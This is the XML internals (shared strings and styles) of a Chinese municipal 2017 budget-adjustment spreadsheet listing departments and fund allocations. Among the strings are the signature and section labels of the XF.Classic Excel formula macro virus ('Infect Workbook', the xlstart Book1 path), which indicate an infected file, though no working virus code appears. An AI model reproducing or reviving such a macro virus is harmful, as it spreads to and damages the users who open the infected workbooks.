  </si>
  <si>
    <t>企业军转干部2017年解困资金、企业军转干部春节座谈和慰问经费、城乡居民社保工作经费、2017年企业离休干部增加离休费、信息化建设及网络升级改造、城乡居保举报奖励资金、2016年社会保险费收入考核征收经费、农民工工资支付情况专项调查经费、农民工劳动报酬保证金和异地维权工作经费、乡镇劳务站人员考核经费</t>
  </si>
  <si>
    <t>基本公共卫生服务配套资金、老年乡村医生困难补助、病媒防治工作经费、免费孕前优生健康检查配套、016年人口计生工作绩效考核奖励资金、市级生育关怀资金、计生协会工作经费、卫生和计生事业发展项目资金、县级公立医院改革配套资金</t>
  </si>
  <si>
    <t>2017年新型农村合作医疗县本级配套补助资金预算不足部分、城乡居民参保筹资工作奖励经费、2017年建档立卡贫困人口参见城乡医保个人缴费</t>
  </si>
  <si>
    <t>农村饮水安全工程水质检测中心经费、人感染禽流感监测、疾病预防专项项目经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市疾病预防控制中心 </t>
  </si>
  <si>
    <t>打击“两非”工作、卫监执法、检测、监测等经费、打击非法行医工作、项目经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市卫生监督所 </t>
  </si>
  <si>
    <t>免费办理出生医学证明、免费产前筛查、免费婚检、农村适龄妇女“两癌”免费检查</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市妇幼保健院 </t>
  </si>
  <si>
    <t>城镇基准地价成果更新工作、预拨地质灾害防治资金金、非税收入结算</t>
  </si>
  <si>
    <t>中央宣传工作经费、专项执法行动经费、农村环境综合整治经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市环境保护局 </t>
  </si>
  <si>
    <t>水口山经济开发区工业污水处理厂运行经费、重金属治理项目本级配套资金</t>
  </si>
  <si>
    <t xml:space="preserve">水松地区重金属污染治理项目建设领导小组 </t>
  </si>
  <si>
    <t>水口山民生搬迁工程拆迁配套工作经费、水口山民生保障搬迁配套房地产评估费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市水口山民生保障居民搬迁工程项目服务工作组 </t>
  </si>
  <si>
    <t>培元湿地公园项目建设本级配套资金</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市环境保护投资有限公司 </t>
  </si>
  <si>
    <t>耕地占补平衡土地开发项目本级资金</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市农业投资发展有限公司 </t>
  </si>
  <si>
    <t>背街小巷及城区道路维修资金、燃气执法、水口山城监队执法监管、水口山环卫所包干经费、水口山环卫所垃圾运输资金、城市建设工作经费、城市开发公司特困企业扶持</t>
  </si>
  <si>
    <t>预计城市建设维护500万元</t>
  </si>
  <si>
    <t>控违拆违工作、中心城区祥规编制、违法建设专项清理整治、历史文化名镇名村申报工作、水口山城建办路灯电费</t>
  </si>
  <si>
    <t>城区免费公交车运行经费、免费公交车司机失业金和经济补偿金、公交免费群体补贴</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市公共交通道路运输管理处 </t>
  </si>
  <si>
    <t>环卫所包干经费、南门桥公厕及垃圾站工程、夏联渠、草桥渠清淤保洁</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市泉峰环境卫生管理所 </t>
  </si>
  <si>
    <t>环卫所包干经费</t>
  </si>
  <si>
    <t>60</t>
  </si>
  <si>
    <t>环卫体制包干项目经费、夏联渠、草桥渠清淤保洁</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市宜阳环境卫生管理所 </t>
  </si>
  <si>
    <t>65</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市培元环境卫生管理所 </t>
  </si>
  <si>
    <t>48</t>
  </si>
  <si>
    <t>“创卫”市政工程建设、2017年上半年园林绿化等项目、5－12月份路灯电费、仙岭垃圾车辆清洗系统采购、仙岭垃圾场污水管建设、仙岭垃圾场渗沥液处理费用、2017年白蚁防治费、园林处洒水车</t>
  </si>
  <si>
    <t>工作经费</t>
  </si>
  <si>
    <t>南门湖新增工程项目回购</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市南门湖指挥部 </t>
  </si>
  <si>
    <t>仙岭垃圾场邻近村组送纯净水资金</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市仙岭垃圾无害化处理场工程建设领导小组 </t>
  </si>
  <si>
    <t>城乡同治工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市环境卫生城乡同治办公室 </t>
  </si>
  <si>
    <t>城市基础设施建设资金</t>
  </si>
  <si>
    <t>旅游建设项目及旅游安全经费、交通事务管理、交通建设、交通安全、船管员、签单员经费</t>
  </si>
  <si>
    <t>级公路建设配套资金</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市农村公路管理所 </t>
  </si>
  <si>
    <t>治超专项经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市交通运输和旅游综合执法大队 </t>
  </si>
  <si>
    <t>海事事务项目经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市地方海事处 </t>
  </si>
  <si>
    <t>全域旅游规划编制工作前期经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市旅游服务中心 </t>
  </si>
  <si>
    <t>预拨交通旅游水毁抢修资金、交通投管理</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市交通建设投资办公室 </t>
  </si>
  <si>
    <t>招商引资引导资金</t>
  </si>
  <si>
    <t>《常宁招商宣传册》制作经费、招商引资专项经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市对外投资促进服务中心 </t>
  </si>
  <si>
    <t>农产品质量安全监管、蔬菜基础建设、农业执法、场所补贴、蔬菜基地洪涝灾害救灾补损资金、油料生产奖励资金及申报油料生产大县工作经费</t>
  </si>
  <si>
    <t>“全民义务植树”活动苗木、016年全市乡村道路绿化补助、2017－2018年油料大县项目申报、林业事务管理、大义山管理局、油茶办等项目经费</t>
  </si>
  <si>
    <t>种子市场检查、种子救灾备荒种子储备基金</t>
  </si>
  <si>
    <t>曾家溪、康家溪风险控制工程、2016年水利工程建设、防汛抗旱专项资金、河道保洁及河道采砂整治、梅埠桥水库、亲仁灌区和祁阳大江边灌区水费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市水利局 </t>
  </si>
  <si>
    <t>水土保持项目前期经费、水土保持监测设备购置、水土保持宣传工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市水土保持站 </t>
  </si>
  <si>
    <t>农机安全生产及拖拉机年检审经费、农机服务项目经费</t>
  </si>
  <si>
    <t>H7N9流感防控工作、发展现代农业协调小组校地合作、专业捕捞渔民禁渔期生活补贴、重大动物疫病扑疫经费</t>
  </si>
  <si>
    <t>村（社区）“两委”换届财务清查和任期经济责任审计经费、惠农减负及涉农利益专项整治、农经系统会计业务培训、为民办实事、村级财务管理项目资金、办公楼屋顶雨棚工程</t>
  </si>
  <si>
    <t>农业综合开发项目经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市农业开发办 </t>
  </si>
  <si>
    <t>2017年西岭镇桐江村烟田水利基础设施工程、烟叶保险本级财政配套补贴资金、烟农人身意外伤害险缴费、烟叶“两金一费”</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市烟叶开发办 </t>
  </si>
  <si>
    <t>气象事务经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市气象局 </t>
  </si>
  <si>
    <t>新能源事务（含太阳能路灯引导、国债沼气池建设、维修、天生态家园等）、太阳能路灯采购资金、光伏扶贫</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市农村能源办公室 </t>
  </si>
  <si>
    <t>水文测报、水资源保护监测工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市水文水资源局 </t>
  </si>
  <si>
    <t>森林公园管理事务</t>
  </si>
  <si>
    <t>林场河堤护坡、围墙修建、绿化工程、农林等村林地林木专项调查工作经费</t>
  </si>
  <si>
    <t>大中型水库特困移民避险解困工作经费、移民事务管理</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市移民局 </t>
  </si>
  <si>
    <t>茶叶生产发展资金</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市茶叶产业发展领导小组办公室 </t>
  </si>
  <si>
    <t>乡镇烟叶税分成</t>
  </si>
  <si>
    <t>油菜本级配套保费补贴</t>
  </si>
  <si>
    <t xml:space="preserve">中国人民财产保险股份有限公司衡阳中心支公司 </t>
  </si>
  <si>
    <t>生猪养殖农业保险补贴本级配套、育肥猪保险本级配套保费补贴</t>
  </si>
  <si>
    <t xml:space="preserve">中国太平洋财产保险股份有限公司衡阳中心支公司 </t>
  </si>
  <si>
    <t>2017年新农村建设财政专项资金</t>
  </si>
  <si>
    <t>扶贫办开办经费、挂图作战经费、精准扶贫工作经费、精准扶贫资料印刷费、市级财政专项扶贫资金（用于精准扶贫）、2016年对口帮扶花垣县补抽乡资金、扶贫工作经费</t>
  </si>
  <si>
    <t>农村危房改造资金配套</t>
  </si>
  <si>
    <t>易地扶贫搬迁项目耕地开垦退还用于精准扶贫</t>
  </si>
  <si>
    <t>健康扶贫、教育扶贫、兜底脱贫</t>
  </si>
  <si>
    <t>路灯安装、山塘维修、公路建设等新农村建设资金、小城镇配套设施建设和维护资金</t>
  </si>
  <si>
    <t>企业扶持资金、科技管理事务、工业信息管理事务、乡镇企业管理事务项目资金、打击“地条钢”和遏制违法违规产能专项行动、配合环保督查工作经费、原工交企业退休老国干生活补助</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市经济科技和信息化局 </t>
  </si>
  <si>
    <t>“PPP”项目、重点工程项目、招投标办工作经费、价格调节基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市发展和改革局 </t>
  </si>
  <si>
    <t>过桥资金专户财政注册资金、016年金融机构新增贷款奖励</t>
  </si>
  <si>
    <t>新网工程项目资金、改制企业党政负责人生活困难补助、供销社事务、添置设施</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市供销社 </t>
  </si>
  <si>
    <t>资源枯竭城市转型发展规划费用、办公场地搬迁经费、资源枯竭城市项目经费</t>
  </si>
  <si>
    <t>老科协、科技特派员工作、老科协三届五次理事费暨2016年总结表彰大会经费、科普项目资金</t>
  </si>
  <si>
    <t>技改贴息、技术研发和推广、执法、禁粘等</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市墙改办 </t>
  </si>
  <si>
    <t>改制企业原党政负责人困难生活补助、特困企业职工生活困难资金、中小企业管理与服务项目、办公楼维修改造</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市轻工业总公司 </t>
  </si>
  <si>
    <t>改制企业负责人生活困难补助、中小企业管理项目经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市商业总公司 </t>
  </si>
  <si>
    <t>全市安全生产监管业务、烟花爆竹销毁工作、“安全生产月”宣传、2016年度安全生产先进及示范乡镇创建奖金</t>
  </si>
  <si>
    <t>安全生产协管员经费、安全生产（金属冶炼）应急演练、专项联合执法、安全生产应急管理体系建设保障经费、烟花爆竹探测仪经费</t>
  </si>
  <si>
    <t>煤炭购销站5人退休职工养老保险金、中心运转经费、煤炭购销站职工失业生活费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市煤炭服务中心 </t>
  </si>
  <si>
    <t>华岁国际商贸城企业发展扶持资金</t>
  </si>
  <si>
    <t xml:space="preserve">华岁国际商贸城工程项目建设领导小组 </t>
  </si>
  <si>
    <t>成品油整治活动、电商扶贫、商务综合执法、回购南门市场商铺资金、社会消费品零售总额联网直报、小分队外出考察招商、招商引资专项事务经费、应急工作经费</t>
  </si>
  <si>
    <t>集贸市场维修改造、新河农贸市场维修</t>
  </si>
  <si>
    <t>粮食管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市粮食服务中心 </t>
  </si>
  <si>
    <t>洪灾水毁供水设施抢修经费</t>
  </si>
  <si>
    <t>项目管理办工作经费</t>
  </si>
  <si>
    <t>金铜置业有限责任公司 、核电项目建设办 、瓦松铁路工程建设小组 、华岁国际商贸城领导小组 、重点交通项目前期筹备领导小组 、易地扶贫搬迁领导小组 、水口山铜铅锌综合基地服务组 、农网升级改造领导小组 、城区小学新扩建项目服务组、北高峰碳酸钙工业园服务组 、新增粮食产能规划田间工程管理办 、深化改革办公室、新型城镇化及改善人居环境工作领导小组</t>
  </si>
  <si>
    <t>2017年农村危房改造工作经费</t>
  </si>
  <si>
    <t>住房保障工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市棚改投资有限责任公司 </t>
  </si>
  <si>
    <t xml:space="preserve">  十四、偿债还本付息资金</t>
  </si>
  <si>
    <t>污水处理厂建设开行贷款利息</t>
  </si>
  <si>
    <t>2017年财政部代理发行地方政府债券还本付息、中医院融资租赁利息、世行贷款本息、人民医院融资利息、2017年省级自发自还地方政府债券还息</t>
  </si>
  <si>
    <t>综合保健大楼建设贷款贴息</t>
  </si>
  <si>
    <t>2017年预算支出调整汇总表</t>
  </si>
  <si>
    <t>项目</t>
  </si>
  <si>
    <t>总计</t>
  </si>
  <si>
    <t>地方政府债券资金小计</t>
  </si>
  <si>
    <t>见附表1</t>
  </si>
  <si>
    <t xml:space="preserve">  二中搬迁</t>
  </si>
  <si>
    <t>城乡投</t>
  </si>
  <si>
    <t xml:space="preserve">  培元湿地公园建设</t>
  </si>
  <si>
    <t>环保投</t>
  </si>
  <si>
    <t xml:space="preserve">  五龙山湘江提水工程建设</t>
  </si>
  <si>
    <t>水务投</t>
  </si>
  <si>
    <t xml:space="preserve">  国省干线建设</t>
  </si>
  <si>
    <t>交通投</t>
  </si>
  <si>
    <t xml:space="preserve">  农村公路建设</t>
  </si>
  <si>
    <t xml:space="preserve">  高标准农田建设</t>
  </si>
  <si>
    <t>农业投</t>
  </si>
  <si>
    <t xml:space="preserve">  棚户区改造项目</t>
  </si>
  <si>
    <t>棚改股</t>
  </si>
  <si>
    <t>见附表2</t>
  </si>
  <si>
    <t>专项资金小计</t>
  </si>
  <si>
    <t>见附表3</t>
  </si>
  <si>
    <t xml:space="preserve">  机关事业专项资金</t>
  </si>
  <si>
    <t xml:space="preserve">  国防公共安全专项资金</t>
  </si>
  <si>
    <t xml:space="preserve">  教育发展专项资金</t>
  </si>
  <si>
    <t xml:space="preserve">  公共文化发展专项资金</t>
  </si>
  <si>
    <t xml:space="preserve">  社会保障和就业专项资金</t>
  </si>
  <si>
    <t xml:space="preserve">  医疗卫生专项资金</t>
  </si>
  <si>
    <t xml:space="preserve">  国土环保专项资金</t>
  </si>
  <si>
    <t xml:space="preserve">  城市建设和管理专项资金</t>
  </si>
  <si>
    <t xml:space="preserve">  交通旅游建设专项资金</t>
  </si>
  <si>
    <t xml:space="preserve">  农林水专项资金</t>
  </si>
  <si>
    <t xml:space="preserve">  新农村建设及扶贫专项资金</t>
  </si>
  <si>
    <t xml:space="preserve">  工业发展及开放型经济发展专项资金</t>
  </si>
  <si>
    <t xml:space="preserve">  住房保障专项资金</t>
  </si>
  <si>
    <t xml:space="preserve">  偿债还本付息资金</t>
  </si>
  <si>
    <t>附表1</t>
  </si>
  <si>
    <t>2017年新增地方政府债券资金安排表</t>
  </si>
  <si>
    <t>专项资金</t>
  </si>
  <si>
    <t>项目名称</t>
  </si>
  <si>
    <t>单  位</t>
  </si>
  <si>
    <t>金  额</t>
  </si>
  <si>
    <t>备  注</t>
  </si>
  <si>
    <t>合计</t>
  </si>
  <si>
    <t>三、教育发展专项资金</t>
  </si>
  <si>
    <t>二中搬迁</t>
  </si>
  <si>
    <t>七、国土环保专项资金</t>
  </si>
  <si>
    <t>培元湿地公园建设</t>
  </si>
  <si>
    <t>八、城市建设和管理专项资金</t>
  </si>
  <si>
    <t>五龙山湘江提水工程建设</t>
  </si>
  <si>
    <t>九、交通旅游建设专项资金</t>
  </si>
  <si>
    <t>国省干线建设</t>
  </si>
  <si>
    <t>省指定安排项目</t>
  </si>
  <si>
    <t>农村公路建设</t>
  </si>
  <si>
    <t>八、农林水专项资金</t>
  </si>
  <si>
    <t>高标准农田建设</t>
  </si>
  <si>
    <t>十三、住房保障专项资金</t>
  </si>
  <si>
    <t>棚户区改造项目</t>
  </si>
  <si>
    <t>2016年结转结余资金支出安排情况明细表（一般预算）</t>
  </si>
  <si>
    <t>2017年安排支出</t>
  </si>
  <si>
    <t>总    计</t>
  </si>
  <si>
    <t xml:space="preserve">市委办公室 </t>
  </si>
  <si>
    <t xml:space="preserve">人民政府办公室 </t>
  </si>
  <si>
    <t xml:space="preserve">宣传部 </t>
  </si>
  <si>
    <t xml:space="preserve">党校 </t>
  </si>
  <si>
    <t xml:space="preserve">电子政务管理办公室 </t>
  </si>
  <si>
    <t xml:space="preserve">财政局 </t>
  </si>
  <si>
    <t xml:space="preserve">公安局 </t>
  </si>
  <si>
    <t xml:space="preserve">公安局交通警察大队 </t>
  </si>
  <si>
    <t xml:space="preserve">人民检察院 </t>
  </si>
  <si>
    <t xml:space="preserve">人民法院 </t>
  </si>
  <si>
    <t xml:space="preserve">司法局 </t>
  </si>
  <si>
    <t xml:space="preserve">党员干部现代远程教育管理中心 </t>
  </si>
  <si>
    <t xml:space="preserve">教育经费核算中心 </t>
  </si>
  <si>
    <t xml:space="preserve">教育局 </t>
  </si>
  <si>
    <t xml:space="preserve">图书馆 </t>
  </si>
  <si>
    <t xml:space="preserve">文化馆 </t>
  </si>
  <si>
    <t xml:space="preserve">文化广电新闻出版局 </t>
  </si>
  <si>
    <t xml:space="preserve">文物局 </t>
  </si>
  <si>
    <t xml:space="preserve">职业中专学校 </t>
  </si>
  <si>
    <t xml:space="preserve">人力资源和社会保障局 </t>
  </si>
  <si>
    <t xml:space="preserve">新型农村合作医疗管理办公室 </t>
  </si>
  <si>
    <t xml:space="preserve">发展与改革局 </t>
  </si>
  <si>
    <t xml:space="preserve">国土资源局 </t>
  </si>
  <si>
    <t xml:space="preserve">建筑工程管理局 </t>
  </si>
  <si>
    <t xml:space="preserve">城市管理行政执法局机关 </t>
  </si>
  <si>
    <t xml:space="preserve">公路管理局 </t>
  </si>
  <si>
    <t xml:space="preserve">供销社 </t>
  </si>
  <si>
    <t xml:space="preserve">交通建设投资办公室 </t>
  </si>
  <si>
    <t xml:space="preserve">交通运输局 </t>
  </si>
  <si>
    <t xml:space="preserve">农村公路管理所 </t>
  </si>
  <si>
    <t xml:space="preserve">住房和城乡建设局 </t>
  </si>
  <si>
    <t xml:space="preserve">环境保护局 </t>
  </si>
  <si>
    <t xml:space="preserve">官岭镇财政所 </t>
  </si>
  <si>
    <t xml:space="preserve">罗桥镇财政所 </t>
  </si>
  <si>
    <t xml:space="preserve">庙前镇财政所 </t>
  </si>
  <si>
    <t xml:space="preserve">白沙镇财政所 </t>
  </si>
  <si>
    <t xml:space="preserve">板桥镇财政所 </t>
  </si>
  <si>
    <t xml:space="preserve">蓬塘乡财政所 </t>
  </si>
  <si>
    <t xml:space="preserve">烟洲镇财政所 </t>
  </si>
  <si>
    <t xml:space="preserve">洋泉镇财政所 </t>
  </si>
  <si>
    <t xml:space="preserve">宜潭乡财政所 </t>
  </si>
  <si>
    <t xml:space="preserve">荫田镇财政所 </t>
  </si>
  <si>
    <t xml:space="preserve">泉峰办事处财政所 </t>
  </si>
  <si>
    <t xml:space="preserve">胜桥镇财政所 </t>
  </si>
  <si>
    <t xml:space="preserve">水口山街道办事处 </t>
  </si>
  <si>
    <t xml:space="preserve">天堂山办事处 </t>
  </si>
  <si>
    <t xml:space="preserve">三角塘镇财政所 </t>
  </si>
  <si>
    <t xml:space="preserve">新河镇财政所 </t>
  </si>
  <si>
    <t xml:space="preserve">农村工作部 </t>
  </si>
  <si>
    <t xml:space="preserve">经管局 </t>
  </si>
  <si>
    <t xml:space="preserve">林业局 </t>
  </si>
  <si>
    <t xml:space="preserve">能源办 </t>
  </si>
  <si>
    <t xml:space="preserve">农村扶贫开发办公室 </t>
  </si>
  <si>
    <t xml:space="preserve">农业机械管理局 </t>
  </si>
  <si>
    <t xml:space="preserve">农业局 </t>
  </si>
  <si>
    <t xml:space="preserve">水利局 </t>
  </si>
  <si>
    <t xml:space="preserve">畜牧水产局 </t>
  </si>
  <si>
    <t xml:space="preserve">烟叶开发办 </t>
  </si>
  <si>
    <t xml:space="preserve">种子管理局 </t>
  </si>
  <si>
    <t xml:space="preserve">经济和信息化局 </t>
  </si>
  <si>
    <t xml:space="preserve">商业总公司 </t>
  </si>
  <si>
    <t xml:space="preserve">市场服务中心 </t>
  </si>
  <si>
    <t xml:space="preserve">安全监督管理局 </t>
  </si>
  <si>
    <t xml:space="preserve">煤炭局 </t>
  </si>
  <si>
    <t xml:space="preserve">商贸局 </t>
  </si>
  <si>
    <t xml:space="preserve">环境保护投资有限公司 </t>
  </si>
  <si>
    <t xml:space="preserve">湘江保护和治理工作委员会 </t>
  </si>
  <si>
    <t xml:space="preserve">水口山民生保障居民搬迁工程项目服务工作组 </t>
  </si>
  <si>
    <t xml:space="preserve">新增粮食产能规划田间工程管理办公室 </t>
  </si>
  <si>
    <t xml:space="preserve">工业固体废物处置项目建设部 </t>
  </si>
  <si>
    <t xml:space="preserve">宜水风光带工程建设领导小组 </t>
  </si>
  <si>
    <t xml:space="preserve">S214线松柏至车田段改造工程协调指挥部 </t>
  </si>
  <si>
    <t xml:space="preserve">白甫水库项目建设工作组 </t>
  </si>
  <si>
    <t xml:space="preserve">培元湿地公园项目建设服务工作组 </t>
  </si>
  <si>
    <t>2011年预算调整.xls</t>
  </si>
  <si>
    <t>Book1</t>
  </si>
  <si>
    <t>C:\Program Files\Microsoft Office\OFFICE11\xlstart\Book1.</t>
  </si>
  <si>
    <t>**Auto and On Sheet Starts Here**</t>
  </si>
  <si>
    <t>ClaKKKKKKKKKK by VicodinES</t>
  </si>
  <si>
    <t>With Lord Natas</t>
  </si>
  <si>
    <t>An Excel Formula Macro Virus (XF.Classic)</t>
  </si>
  <si>
    <t>Hydrocodone/APAP 10-650 For Your Computer</t>
  </si>
  <si>
    <t>(C) The Narkotic Network 1998</t>
  </si>
  <si>
    <t>**Simple Payload**</t>
  </si>
  <si>
    <t>**Set Our Values and Paths**</t>
  </si>
  <si>
    <t>**Add New Workbook, Infect It, Save It As Book1.xls**</t>
  </si>
  <si>
    <t>**Infect Workbook**</t>
  </si>
  <si>
    <t>单位：万元</t>
    <phoneticPr fontId="10" type="noConversion"/>
  </si>
  <si>
    <t>附表2</t>
    <phoneticPr fontId="10" type="noConversion"/>
  </si>
  <si>
    <t>结转结余资金 一般预算资金小计</t>
    <phoneticPr fontId="10" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>其中：精准扶贫2</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>00万元</t>
    </r>
    <phoneticPr fontId="10" type="noConversion"/>
  </si>
  <si>
    <t>其中：精准扶贫100万元</t>
    <phoneticPr fontId="10" type="noConversion"/>
  </si>
  <si>
    <t>其中：精准扶贫116万元</t>
    <phoneticPr fontId="10" type="noConversion"/>
  </si>
  <si>
    <t>其中：精准扶贫5万元</t>
    <phoneticPr fontId="10" type="noConversion"/>
  </si>
  <si>
    <t>其中：精准扶贫115万元</t>
    <phoneticPr fontId="10" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>其中：精准扶贫2045</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>万元（扶贫办1457万元，残联100万元，教育205万元，农合办116万元，西岭20万元，其他95万元）</t>
    </r>
    <phoneticPr fontId="10" type="noConversion"/>
  </si>
  <si>
    <t>其中：精准扶贫1457万元</t>
    <phoneticPr fontId="10" type="noConversion"/>
  </si>
  <si>
    <t>2017年专项资金追加预算安排情况表</t>
    <phoneticPr fontId="10" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2017</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="16"/>
        <rFont val="黑体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>年财政预算调整总表</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="16"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
        <charset val="134"/>
      </rPr>
      <t/>
    </r>
    <phoneticPr fontId="10" type="noConversion"/>
  </si>
  <si>
    <t>常宁市2017年财政收入分部门调整表</t>
    <phoneticPr fontId="10" type="noConversion"/>
  </si>
  <si>
    <t>常宁市2017年财政一般预算收入调整表</t>
    <phoneticPr fontId="10" type="noConversion"/>
  </si>
  <si>
    <t>2017年预算调整项目内容明细表</t>
    <phoneticPr fontId="10" type="noConversion"/>
  </si>
</sst>
</file>

<file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <numFmts count="1">
    <numFmt numFmtId="176" formatCode="0_ "/>
  </numFmts>
  <fonts count="17">
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Times New Roman"/>
      <family val="1"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="16"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="16"/>
      <name val="黑体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="16"/>
      <name val="Times New Roman"/>
      <family val="1"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <color indexed="81"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
  </fonts>
  <fills count="15">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>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27"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="46"/>
        <bgColor indexed="64"/>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26"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="29"/>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710">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="6" borderId="0" applyNumberFormat="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 fillId="5" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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5" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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pplyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2"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 fillId="2"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pplyNumberFormat="0" applyFill="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5" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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 fillId="4" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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pplyNumberFormat="0" applyFill="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 fillId="5"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5" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="5" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
